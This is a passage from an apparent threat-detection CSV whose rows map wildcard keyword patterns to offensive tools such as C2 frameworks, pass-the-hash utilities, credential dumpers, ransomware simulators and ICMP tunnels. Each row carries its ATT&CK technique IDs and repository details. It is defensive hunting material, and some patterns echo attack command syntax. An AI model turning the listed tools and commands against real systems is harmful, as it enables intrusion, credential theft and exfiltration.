Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*PsExecMenu(*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PSEXECSVC*","greyware_tool_keyword","psexec","PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. install persistent threats. and evade some security systems. ","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*PShlSpy*","signature_keyword","Antivirus Signature","highly revelant Antivirus signature. phishing tools","N/A","N/A","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*psinject * x64 Invoke-*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*psinject -PID*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*pslo *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*PsLoggedon.exe*","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. 
or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PsLoggedon64.exe*","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*pSNIRFgTuZnCdHN*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z"
+"*PSObfucate.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
+"*Pspersist-main*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
+"*PSprofile.cpp*","offensive_tool_keyword","Pspersist","Dropping a powershell script at 
%HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z"
+"*pspy*psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy32 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy64 -*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-build:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-development:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-example:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - 
T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-master*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*pspy-testing:latest*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*PSRansom.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z"
+"*PSRecon*","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. 
or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","5","465","111","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z"
+"*psreflect *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*pstgdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*pstree.ps1*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*PSWtool*","signature_keyword","Antivirus Signature","highly revelant Antivirus signature. Programs classified as PSWTool can be used to view or restore forgotten often hidden passwords. They can also be used with malicious intent. 
even though the programs themselves have no malicious payload.","N/A","N/A","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*PtC.exe challenge*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PtC.exe compare*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PtC.exe inject*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PtC.exe nthash *","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PtC.exe ping*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*PtC.exe protect*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z"
+"*pth-net rpc group members *Domain admins*","offensive_tool_keyword","exegol","Fully featured 
and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pth-net rpc group members *Exchange Servers*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pth-net rpc password * -U * -S *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pth-net rpc user add * -U *-S *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*pth-rpcclient*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral 
movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z"
+"*pth-smbclient*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z"
+"*PTHSMBClientDelete*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*PTHSMBClientGet*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*PTHSMBClientList*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*PTHSMBClientPut*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - 
T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*PTHSMBExec*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*pth-smbget*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z"
+"*pth-toolkit*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z"
+"*pth-winexe*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral 
movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z"
+"*pth-wmic*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z"
+"*PTHWMIExec*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*pth-wmis*","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","509","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z"
+"*PTRACE_SETOPTIONS failure*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*ptresearch/AttackDetection*","offensive_tool_keyword","POC","POC exploits - The Attack 
Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. so we develop Suricata rules for detecting all sorts of such activities.","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ptresearch/AttackDetection","1","1","N/A","N/A","10","1266","367","2022-08-31T09:26:21Z","2016-03-24T14:42:50Z"
+"*ptunnel-client.log*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-data-recv*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-data-send*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-master*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng *","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data 
Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng.conf*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng.git*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng.service*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng.te*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng-x64.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng-x64-dbg.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" 
+"*ptunnel-ng-x86.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-ng-x86-dbg.exe*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*ptunnel-server.log*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z"
+"*Public\dcinst.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
+"*pupy*/checkvm.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*pupy/payload_*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*PupyCmdLoop*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
